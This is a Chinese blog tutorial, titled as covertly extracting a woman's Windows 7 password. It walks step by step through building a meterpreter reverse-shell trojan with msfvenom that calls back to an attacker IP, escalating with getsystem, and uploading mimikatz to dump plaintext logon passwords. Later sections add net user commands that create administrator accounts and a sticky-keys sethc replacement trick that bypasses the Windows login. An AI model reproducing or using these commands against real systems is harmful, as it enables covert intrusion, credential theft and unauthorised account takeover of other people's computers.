本文技术仅仅用于安全测试教学,禁止用于不当目的!
内网渗透神器:使用mimikatz悄悄提取妹子Win7密码
在kali渗透之内网渗透中,黑客都会想方设法在目标设备中获取重要的文件或资料,其中获得密码就是一件重要的事!小白学习白帽黑客kali渗透,前往下方专栏即可!
获得meterpreter会话
有人问,我都进入对方电脑了,还要密码干嘛?这里获得的密码有助于横向渗透,一般开机密码,是打开其他局域网电脑的钥匙,更是电脑某些服务的登陆密码,所以这些凭证很重要!
环境:
使用kali-2020,建议进入root!(输入su,输入密码即可!)
使用win7靶机
使用meterpreter建立的会话获得远程windows的SAM文件!
这种方式适用于测试的靶机已经运行了你的免杀木马可执行载荷,也就说使用我们的kali已经获得了靶机的meterpreter会话!
使用msfvenom生成windows有效载荷(一般木马),kali终端下输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.206 LPORT=8888 -f exe > test.exeLHOST是你kali的桥接网络IP;LPORT随便设置,只要不和其他冲突即可。
将主目录下生成的可执行木马载荷放到kali的/var/www/html中,并且删除html目录下.html为后缀的文件(没有就不用管!)
开启kali的apache2服务,在终端中输入:
service apache2 startApache2可以提供基本的web服务,也就是说远程的靶机可以访问kali的ip就可以自动访问kali的/va/www/html/下的文件,进行访问下载!Apache2此时就相当于一个小型服务器!
win7靶机(桥接网络)浏览器访问:192.168.31.206,然后选中test.exe.进行下载到桌面。
kali,启动metasploit工具,并设置监听:
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.31.206set lport 8888run既然已经设置了监听,我们直接去win7模拟运行有效载荷test.exe,然后就会看到kali的metasploit就会收到会话!
我们已经获得了win7靶机的meterpreter会话,现在我们可以通过一个meterpreter命令"hashdump"就可以直接下载win7靶机的hash文件,这里获取的不是被二次加密的SAM文件,而是自动获取win7被解密后的SAM文件形成的hash值!
但是我们首先需要看下当前获得的会话是什么权限?输入"getuid"
管理员权限,不是system权限,无法提取hash值,我们第一步就需要直接输入"getsystem"来使用meterpreter默认的技术进行win7提权!看看能不能变成system权限。执行完毕,输入getuid查看,已经是system权限!Bingo!
知识补充,如果输入getsystem无法提权,这就需要其他的利用模块绕过win7的提权,这里暂时不讲,以后会讲解!
我们输入"hashdump",看看是否得到hash值
很不幸,没有得到我们想要的hash值,原因是部分win7系统拒绝metasploit进行访问提取hash!怎么办?我们继续试探!
上传mimikatz
既然直接输入hashdump不行,我们试试上传破解工具到win7靶机中进行远程抓取!
已经加入专栏课程《白帽黑客kali初学指南》的学员,可以直接在我们的专栏资料库中找到mimikatz!
没有加入的,可以点击>>《白帽黑客kali初学指南》加入专栏,然后私信@小白嘿客获取专栏资料库。
这里提醒:根据目标系统的位数,请在资料库中选择不同版本的mimikatz!
上传命令是:
upload Win32 c:\\然后在meterpreter中输入"shell"进入win7靶机的cmd终端模拟器。如果出现乱码,输入chcp 65001即可解决乱码。
这里获得的cmd显示在对方的桌面中,我们应该切换到c盘根目录下,你发现cmd此时就在c:\下,然后输入dir查看验证下远程的win7靶机c盘是否有我们上传上去的mimikatz工具!
在cmd中输入"mimikatz.exe"远程启动我们的破解工具。
这里需要提醒,如果之前的meterpreter会话断开过,需要重新建立,而且要保证已经使用meterpreter的getsystem命令进行了本地对远程win7靶机的提权!否则mimikatz.exe可能无法运行,不过亲身尝梨知酸甜,还需要亲身实践哈!
输入"mimikatz.exe"运行我们的破解工具。
然后输入privilege::debug,显示20 ok即可完成提权!
然后输入sekurlsa::logonPasswords,开始远程抓取win7靶机的hash值!你会很开心的!看下图!
理论上会将win7靶机的所有用户以及密码都打印在meterpreter会话中的模拟cmd窗口中!我们这里只关注Administrator这个管理员用户!
你此时发现SHA1这种hash值根本就不用解密,红色的框中已经自动解密出密码123456,用户Administrator了!
到此,我们利用meterpreter会话上传mimikatz工具到win7靶机上,然后在kali中实现操控靶机的cmd,成功破解出了明文口令!根本就不需要拿到hash值。
小白嘿客我想说
更多网络安全、白帽黑客入门到实战技术,可以前往下方专栏进行学习,你也能快速成为渗透大神!
→《从新手到web白帽黑客》,网站渗透侵入的深入浅出教程:
→《安卓手机渗透测试》,将手机打造成功嘿客神器并渗透安卓手机:
→《网络安全训练营》,和众多kali爱好者一起交流、学习,还有更多技术干货:
(此处已添加圈子卡片,请到今日头条客户端查看)
win7不用u盘怎么破解开机页面用户密码。。
开机的时候按F8选择“带命令提示的安全模示”
进去之后全弹出一个命令窗口。
键入命令:"net user ***** 123456 /add",然后将会新添加一个"*****"用户的口令更改为"123456"。若想在此添加一新用户(如:用户名为abcdef,口令为123456)的话,请键入"net user abcdef 123456 /add",添加后可用"net localgroup administrators abcdef /add"命令将用户提升为系统管理组"administrators"的用户,并使其具有超级权限
如果你的系统进不去安全模式的话,这就要恭喜你的系统可以进入PE,那么你可以在“开始”菜单下,点击“运行”(或按快捷键“飞行窗口键”(微软标徽)+R)会弹出一个运行窗口,输入cmd按回车,在输入上面所说的命令,功能一样。
忘记开机密码?无需u盘,教你3分钟破解Windows密码!
忘记开机密码的情况,真是说来就来!
我们都知道u盘启动盘具有很多功能,可以重装系统,修复系统,还可以破解开机密码。
但是,前提是你忘记密码的时候,刚好有个u盘启动盘在旁边。
那你就可以接入电脑,设置u盘启动,再使用密码修改软件来设置新的密码,或者是取消开机密码。
那么,万一你忘记密码的时候,身边没有u盘启动盘怎么办呢?
又或者说有u盘,但是你没办法开机,自然也就没有办法制作u盘启动盘,同样是没有办法呀!
所以说,大家还是要像大白菜一样,身上拥有多项技能,比如说无需u盘就可以破解Windows密码的技能!
下面,就来分享一个非常好用的方法,教你3分钟破解“忘记”的开机密码,无需借助任何工具!
破解Windows密码:首先,重启电脑,在电脑启动之前,再次重启电脑,进入Windows错误恢复界面,选择“启动修复”。
如果两次重启都没有出现修复界面,可以尝试多次重启,因为系统会通过电脑启动异常情况,选择自动进入修复界面。
之后,Windows会加载文件,出现“系统还原”提示的时候,点击“取消”,不要还原系统!
随后,Windows会弹出“启动修复”页面,我们点击展开“查看问题详细信息”。
在问题列表中,向下滑动至末端,点击最后的链接,就会打开一个文本文档。
我们继续点击“文件”-“打开”,依次点击打开“C盘-Windows-system32”。
双击进入system32文件夹之后,将文件类型设置为“所有文件”,确保可以查看所有文件,先找到“sethc”文件,重命名为“sethc-123”。
继续找到“cmd”文件,右键复制粘贴到system32文件夹中。
然后,右键cmd文件副本,重命名为“sethc”。
重命名完毕后,关闭所有窗口,回到自动修复页面,点击“完成”,等待电脑重启。
再次进入密码登录页面之后,连续按下5次shift键,打开cmd命令窗口,我们要设置新密码。
在命令页面中,输入“net user admin *”,这里的admin,指的是你的用户名,你可以根据实际情况来输入。
输入完毕后,按下回车,就会出现“请键入用户的密码”,这里是指输入新的密码,如果想没有开机密码,那就直接回车。
提示确认密码时,再次按回车,就可以让密码取消了。
最后,关闭命令页面,再次登录Windows系统,就不需要密码,可以直接进入桌面了!
怎么样,是不是全程操作都不需要借助任何工具,全凭自己实力解决!
3分钟搞定Windows开机密码,妥妥的!
骄傲的大白菜!
还没有评论,来说两句吧...